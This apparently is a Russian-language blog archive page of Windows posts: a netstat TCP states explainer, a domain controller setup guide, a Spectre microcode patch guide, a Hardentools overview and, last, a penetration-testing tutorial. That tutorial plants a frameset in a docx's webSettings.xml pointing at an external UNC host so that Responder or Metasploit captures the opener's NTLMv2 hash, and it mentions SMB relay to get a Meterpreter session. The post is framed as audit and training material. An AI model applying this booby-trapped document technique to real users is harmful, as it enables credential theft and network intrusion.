Архив метки: Windows

Что за состояния CLOSE_WAIT и TIME_WAIT?

Когда я делаю netstat -a на своем копмьютере Windows, я получаю список портов с одним из четырех состояний:

- LISTENING

- CLOSE_WAIT

- TIME_WAIT

- ESTABLISHED

Что CLOSE_WAIT и TIME_WAIT значит / указывает?

Из-за того, как работает TCP/IP, соединения не могут быть закрыты сразу. Пакеты могут выйти из строя или быть переданы повторно после того, как соединение было закрыто. CLOSE_WAIT указывает, что удаленная конечная точка (другая сторона соединения) закрыла соединение. TIME_WAIT указывает, что локальная конечная точка (эта сторона) закрыла соединение. Соединение поддерживается таким образом, что любые задержанные пакеты могут быть сопоставлены с соединением и обработаны соответствующим образом. Соединения будут удалены, когда они тайм-аут в течение четырех минут. Видеть http://en.wikipedia.org/wiki/Transmission_Control_Protocol для более подробной информации.



2018-07-14T20:03:32
Вопросы читателей

Настройка контроллера домена на WindowsServer2012.

В предыдущей статье описание подключения и установки сервера.

Нужно отметить, что контроллер домена в нашей сети до этого момента уже существовал на виртуальной машине. Задача состоит в том, чтобы настроить контроллер домена на реальной машине, сделать его вторым  резервным, затем передать ему полномочия главного контроллера и отключить (демонтировать) виртуальную машину. Так же за одно осуществится перенос контроллера домена с Windows Server 2008 R2 на более новый Windows Server 2012 R2. Приступим.

          Сразу после установки Windows Server 2012 R2 и авторизации под учетной записью администратора на экране открывается приложение «Диспетчер серверов» и предлагает нам настроить сервер. Если он не открылся или случайно закрылся, то найти его можно на панели задач внизу слева.

Нажимаем добавить роли и компоненты.

Установка ролей и компонентов >> Далее.

Выбираем наш сервер >> Далее.

В качестве ролей сервера выбираем DNS-сервер и Доменные службы Active Directory. Как правило, DHCP-сервер идет третьим вместе с двумя предыдущими ролями, однако у нас в сети он не задействован по причине местных обстоятельств.

В разделе «Компоненты» оставляем всё без изменения >> Далее.

Читаем об службах, которые мы добавляем >> Далее.

Подтверждаем выбор и нажимаем >> Установить.

Ждем пока идет установка.

После установки в диспетчере серверов появятся AD DS и DNS. Нажимаем на флажок с предупреждением в верхней части окна и выбираем надпись – Повысить роль этого сервера до уровня контроллера домена.

Откроется мастер настройки доменных служб Active Directory. При выборе операции развертывания отмечаем пункт: Добавить контроллер домена в существующий домен.

Вводим название нашего домена, учетные данные и получаем ошибку – Не удалось связаться с контроллером домена Active Directory для домена «SCRB». Убедитесь что доменное имя DNS введено правильно.

Переходим в настройки сети и в свойствах TCP/IP проверяем, какой введен DNS. DNS-ом должен быть IP-адрес действующего контроллера домена, у нас это 192.168.1.130 (было прописано что-то другое).

Снова пробуем указать сведения о существующем домене. На сей раз ошибка другой тематики – Не удалось войти в домен с указанными учетными данными. Введите действительные учетные данные и попробуйте еще раз.

На самом деле я часто подсматриваю настройки на сайте первоисточника Microsoft. Насчет авторизации там написано, что нужно использовать учетную запись с правами администратора действующего домена.

Значит, применим эту учетную запись.

Когда все настройки введены правильно, при вводе домена можно нажать на кнопку «Выбрать» и наш действующий домен появится в списке. Выбираем его.

На следующем пункте вводим пароль из цифр и букв разного регистра>> Далее.

Следующим пунктом значатся параметры DNS. Оставляем их пока что без изменений. Жмем >> Далее.

Указываем источник репликации – действующий контроллер домена. Репликация это восстановление (синхронизация) данных Active Directory одного контроллера домена на других. Когда работает репликация изменения в одном контроллере домена (допустим создание нового пользователя) через некоторое время переносятся и во все остальные.

Расположение баз данных AD и файлов оставляем без изменения.

Параметры подготовки >> Далее.

Предоставляется последний шанс проверить параметры. Проверяем, жмем – Далее. Начнется проверка предварительных требований.

Нажимаем – Установить.

После установки и перезагрузки автоматически начнется репликация. Для того, чтоб в этом убедиться, переходим в Диспетчер серверов >> AD DS. Нажимаем правой кнопкой мыши на наш контроллер домена DCSERVER и выбираем пункт меню – Пользователи и компьютеры Active Directory. Откроется оснастка и в директории Managed Service Accounts мы начинаем узнавать знакомых пользователей. Всего в домене у нас пока что около 70 пользователей. Все они со временем появились.

Если зайти в директорию контроллеров доменов, то можно увидеть что их теперь два.

Продолжение.



2018-05-27T14:33:29
Настройка ПО

Проблемы с Wi-Fi и беспроводным домашним интернетом

Роутеры и точки доступа с Wi-Fi — неотъемлемый атрибут пользователя домашнего и мобильного интернета вот уже 10 лет. Однажды скорость работы Wi-Fi-сети может сильно снижаться, а иногда беспроводное соединение пропадает совсем и надолго.

Читать

Windows Spectre патчи

Чтобы полностью защитить ПК от Spectre, вам необходимо обновить микрокод процессора Intel. Обычно это обеспечивается производителем вашего ПК через обновление прошивки UEFI, но теперь Microsoft предлагает дополнительный патч с новым микрокодом.

Мы считаем, что большинству людей стоит дождаться, когда производители ПК начнут развертывать это обновление, а не спешить устанавливать исправление Microsoft.

Но, если вас особенно беспокоят атаки Spectre, вы можете получить обновленный микрокод от Microsoft, даже если ваш производитель ПК не планирует его выпускать.

Патч от Microsoft доступен только для Windows 10.

Почему ваш ПК может быть уязвим для Spectre

Spectre и Meltdown были раскрыты в одно и то же время, так что это может быть немного запутанным.

Исходный патч Windows защищен от атаки Meltdown, но для полной защиты от Spectre требуется обновление микрокода процессора от Intel.

Технически обновление микрокода, о котором мы говорим здесь, защищает от Spectre Variant 2, «Branch Target Injection».

Вы можете проверить, защищен ли ваш ПК от Spectre с помощью инструмента InSpectre от Gibson Research Corporation.

Предполагая, что вы не установили обновление прошивки UEFI у производителя вашего компьютера или производителя материнской платы, если вы создали свой собственный компьютер, вы увидите, что ваш компьютер уязвим для Spectre.

Если у вас уже установлены эти исправления, этот инструмент показывает, насколько патчи влияют на производительность вашего ПК.

Все это звучит здорово, но есть одна проблема: стабильность системы.

Первоначальные обновления микрокода Intel вызвали случайную перезагрузку многих систем.

Новые обновления микрокодов кажутся стабильными, и мы не видели сообщений о распространенных проблемах.

Тем не менее, производитель вашего компьютера может тратить время на проверку того, что обновление не вызовет проблем на вашем ПК, прежде чем они сделают его доступным для вас.

На официальной странице документации Microsoft Microsoft заявляет, что она «не знает о каких-либо проблемах, которые влияют на это обновление в настоящее время», но также вам следует «проконсультироваться с веб-сайтами вашего производителя и Intel по поводу их рекомендаций по микрокодам для вашего устройства перед применением этого обновления к вашему устройство «.

Итак, наша рекомендация заключается в том, что вы сначала проверяете сайт своего производителя ПК на обновление UEFI или BIOS и устанавливаете его, если это возможно.

Если обновление недоступно, и вам неудобно ждать до тех пор, пока он не появится, вы можете захотеть рассмотреть обновление микрокода Microsoft.

Многие из худших опасений по поводу Spectre были устранены другими патчами программного обеспечения, что делает это обновление менее срочным. Например, веб-браузеры выпустили обновления, которые запрещают веб-сайтам использовать Spectre через код JavaScript. Spectre гораздо труднее использовать, чем Meltdown.

Мы еще не видели серьезных эксплойтов Spectre в дикой природе.

Итак, в общем, мы не рекомендуем рисковать этим.

Возможно, сами Microsoft могут захотеть проверить это обновление, прежде чем загружать его всем пользователям Windows автоматически через Центр обновления Windows, хотя мы и не знаем, какие патчи Microsoft планируют для этого обновления.

Однако некоторые типы систем по-прежнему особенно уязвимы.

Системы, которые запускают виртуальные машины, содержащие ненадежный код в облачной службе хостинга, должны почти наверняка установить обновление микрокода в этих системах.

Как установить обновления микрокода от Microsoft



Мы не рекомендуем всем пользователям Windows стремиться устанавливать эти исправления.

Но если вас беспокоит Spectre, и вы хотите обновить микрокод сейчас, вы можете скачать его.

Обратите внимание, что обновления микрокода доступны только для некоторых процессоров, и они доступны только для Windows 10 версии 1709, то есть обновления для разработчиков Fall.

Windows 7, Windows 8 и более ранние версии Windows 10 не поддерживаются. По состоянию на 13 марта 2018 года исправление Microsoft поддерживает процессоры Intel Core 6e поколение (Skylake), 7-го поколения (Kaby Lake) и 8-го поколения (Coffee Lake), а также некоторые процессоры Intel Xeon.

Вы можете проверить, поддерживается ли ваш процессор, используя бесплатный инструмент InSpectre, о котором мы упоминали выше.

Найдите строку «CPUID», а затем посетите страницу обновлений микрокодов Intel на веб-сайте Microsoft.

Убедитесь, что идентификатор CPUID, показанный в InSpectre на вашем компьютере, указан на странице Microsoft. Если это не так, обновление Windows еще не поддерживает ваш процессор с обновлениями микрокода, но может и в будущем.

Если ваш процессор поддерживается и вам требуется обновление, например, если InSpectre говорит, что вы не защищены от Spectre, вы можете загрузить обновление и установить его.

Это обновление не будет установлено автоматическим на вашем ПК, но должно быть загружено вручную через веб-сайт каталога обновлений Microsoft.

Загрузите патч KB4090007 на веб-сайте «Обновление каталога». Доступны как 64-разрядные, так и 32-разрядные версии, поэтому загрузите соответствующую версию для любой версии Windows, которую вы установили: x64 для 64-разрядной Windows или x86 для 32-разрядной Windows.

Запустите загруженный файл установщика, чтобы установить микрокод на свой компьютер.

После этого вам будет предложено перезагрузить компьютер.

После установки обновления снова запустите инструмент InSpectre, и он должен сообщить вам, что ваша система защищена от Spectre.

 

 



2018-03-20T14:30:49
Закрытие уязвимостей

Как отключить опасные функции Windows: Hardentools

Hardentools – это набор простых утилит, предназначенных для отключения ряда «функций», открытых операционными системами (Microsoft Windows, на данный момент) и основными потребительскими приложениями.

Эти функции, обычно нацеленные для корпоративных клиентов, обычно бесполезны для обычных пользователей и, скорее, представляют собой опасность, поскольку злоумышленники часто злоупотребляют ими для выполнения вредоносного кода на компьютере жертвы.

Цель этого инструмента – просто уменьшить поверхность атаки, отключив ряд функционала.

Hardentools предназначен для людей с повышенным риском, которым может потребоваться дополнительный уровень безопасности по цене за некоторые удобства использования.

Он не предназначен для корпоративной среды.

    ПРЕДУПРЕЖДЕНИЕ: Это просто эксперимент, он еще не предназначен для публичного распространения. Кроме того, этот инструмент отключает ряд функций, в том числе Microsoft Office, Adobe Reader и Windows, что может привести к сбоям в работе определенных приложений. Используйте это на свой страх и риск.

Имейте ввиду, что после запуска Hardentools вы не сможете, например, выполнять сложные вычисления с помощью Microsoft Office Excel или использовать терминал командной строки, но это в значительной степени единственные значительные «недостатки» в том, что у вас немного безопаснее Окружающая среда Windows .

Прежде чем принимать решение об использовании, убедитесь, что вы внимательно прочитали этот документ и понимаете, что да, что-то может сломаться.

Если у вас возникли сбои в результате изменений, дайте знать разработчикам.

Как обезопасить Windows

Что этот инструмент не делает

  • Это не предотвращает эксплуатацию программного обеспечения.

  • Он НЕ предотвращает злоупотребление всеми доступными рискованными функциями.

  • Это не антивирус. Он не защищает ваш компьютер. Он не идентифицирует, блокирует и не удаляет вредоносное ПО.

  • Он НЕ предотвращает возврат изменений, которые он реализует. Если в системе запущен вредоносный код и он может их восстановить, предпосылка инструмента будет побеждена, не так ли?

Отключение функций

Общие функции Windows

  • Отключить хост сценария Windows. Windows Script Host позволяет выполнять файлы VBScript и Javascript в операционных системах Windows. Это обычно используется обычными вредоносными программами (такими как ransomware), а также целевыми вредоносными программами.

  • Отключение автозапуска. Отключает AutoRun / AutoPlay для всех устройств. Например, это должно предотвратить автоматическое выполнение аппликаций при подключении USB-накопителя к компьютеру.

  • Отключает выполнение powershell.exe, powershell_ise.exe и cmd.exe через проводник Windows. Вы не сможете использовать терминал, и это должно помешать использованию PowerShell вредоносным кодом, пытающимся заразить систему.

  • Устанавливает контроль учетных записей пользователей (UAC), чтобы всегда запрашивать разрешение (даже при изменении конфигурации) и использовать «безопасный рабочий стол».

  • Отключить расширения файлов, в основном используемые для вредоносных целей. Отключает «.hta», «.js», «.JSE», «.WSH», «.WSF», «.scf», «.scr», «.vbs», «.vbe» и «.pif «Расширения файлов для текущего пользователя (и для системных значений по умолчанию, что имеет значение только для вновь созданных пользователей).

Microsoft Office

  • Отключить макросы. Макросы иногда используются пользователями Microsoft Office для сценариев и автоматизации определенных действий, особенно расчетов с Microsoft Excel. Однако макросы в настоящее время являются угрозой безопасности, и они широко используются как средство компромисса. С Hardentools макросы отключены, а уведомление «Включить все содержимое» также отключено, чтобы пользователи не обманывались.

  • Отключить выполнение OLE-объекта. Приложения Microsoft Office могут внедрять так называемые «OLE-объекты» и выполнять их, а также автоматически (например, с помощью анимации PowerPoint). Исполняемые файлы Windows, такие как шпионские программы, также могут быть встроены и выполнены как объекты. Это также является катастрофой безопасности, которую мы наблюдаем снова и снова, особенно в случае нападений на активистов в репрессированных регионах. Hardentools полностью отключает эту функциональность.

  • Отключение ActiveX. Отключает элементы управления ActiveX для всех приложений Office.

  •  Отключить DDE. Отключает DDE для Word и Excel

Acrobat Reader

  • Отключить JavaScript в документах PDF. Acrobat Reader позволяет выполнять JavaScript-код из PDF-документов. Это широко используется для эксплуатации и злонамеренной деятельности.

  • Отключить выполнение объектов, встроенных в документы PDF. Acrobat Reader также позволяет выполнять внедренные объекты, открывая их. Обычно это поднимает предупреждение о безопасности, но учитывая, что законное использование этого является редким и ограниченным, Hardentools отключает это.

  • Включить защищенный режим (включен по умолчанию в текущих версиях)

  • Включить защищенный просмотр для всех файлов из ненадежных источников

  • Включить расширенную защиту (включен по умолчанию в текущих версиях)

Скачать Hardentools



2018-03-20T13:42:52
Закрытие уязвимостей

Microsoft Office – Хэш NTLM через Frameset

Офисные документы Microsoft играют жизненно важную роль в оценке этичного хакера или тестироващика на проникновение, поскольку обычно они используются, чтобы получить некоторую начальную точку опоры во внутренней сети клиента.

Пребывание под радаром также является ключевым элементом, и это может быть достигнуто только путем злоупотребления законными функциональными возможностями Windows или доверенного приложения, такого как офис Microsoft.

Исторически Microsoft Word использовался как HTML-редактор.

Это означает, что он может поддерживать HTML-элементы, такие как framesets.

Поэтому можно связать документ Microsoft Word с UNC-контуром и расчесывать его с помощью responder, чтобы захватывать хеши NTLM извне.

Документы Word с расширением docx представляют собой zip-файл, который содержит различные XML-документы.

Эти файлы XML управляют темой, шрифтами, настройками документа и веб-настройками.

Используя 7-zip, можно открыть этот архив, чтобы изучить эти файлы:

Папка слова содержит файл, который называется webSettings.xml.

Этот файл необходимо изменить, чтобы включить набор фреймов.

Добавление следующего кода создаст ссылку на другой файл.

<w:frameset>

<w:framesetSplitbar>

<w:w w:val="60"/>

<w:color w:val="auto"/>

<w:noBorder/>

</w:framesetSplitbar>

<w:frameset>

<w:frame>

<w:name w:val="3"/>

<w:sourceFileName r:id="rId1"/>

<w:linkedToFile/>

</w:frame>

</w:frameset>

</w:frameset>

Новый файл webSettings.xml, содержащий набор фреймов, должен быть добавлен обратно в архив, чтобы предыдущая версия была перезаписана.

Необходимо создать новый файл (webSettings.xml.rels), чтобы содержать идентификатор отношения (rId1) UNC-путь и TargetMode, если он является внешним или внутренним.

 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Relationships

xmlns="http://schemas.openxmlformats.org/package/2006/relationships">

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\192.168.1.169Microsoft_Office_Updates.docx" TargetMode="External"/>

</Relationships>

Каталог _rels содержит связанные отношения документа с точки зрения шрифтов, стилей, тем, настроек и т. д.

Посадка нового файла в этом каталоге завершит связь отношений, которая была создана ранее через набор фреймов.

Теперь, когда документ Word был вооружен для подключения к UNC-пути через Интернет, responder может быть настроен для захвата хешей NTLM.

Как только целевой пользователь откроет документ документа, он попытается подключиться к UNC-пути.

Ответчик получит хэш NTLMv2 пользователя.

В качестве альтернативы Metasploit Framework может использоваться вместо ответчика, чтобы захватить хэш пароля.

 auxiliary/server/capture/smb

Хеши NTLMv2 будут записаны в Metasploit после открытия документа.

Вывод

Этот метод позволяет атакующему захватить хэши паролей домена у пользователей, которые могут привести к внутреннему доступу к сети, если двухфакторная аутентификация для доступа к VPN не включена и существует слабая политика паролей.

Кроме того, если целевой пользователь является повышенной учетной записью, такой как локальный администратор или администратор домена, этот метод можно комбинировать с реле SMB, чтобы получить сеанс Meterpreter.

¯_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.



2018-03-13T14:33:36
Аудит ИБ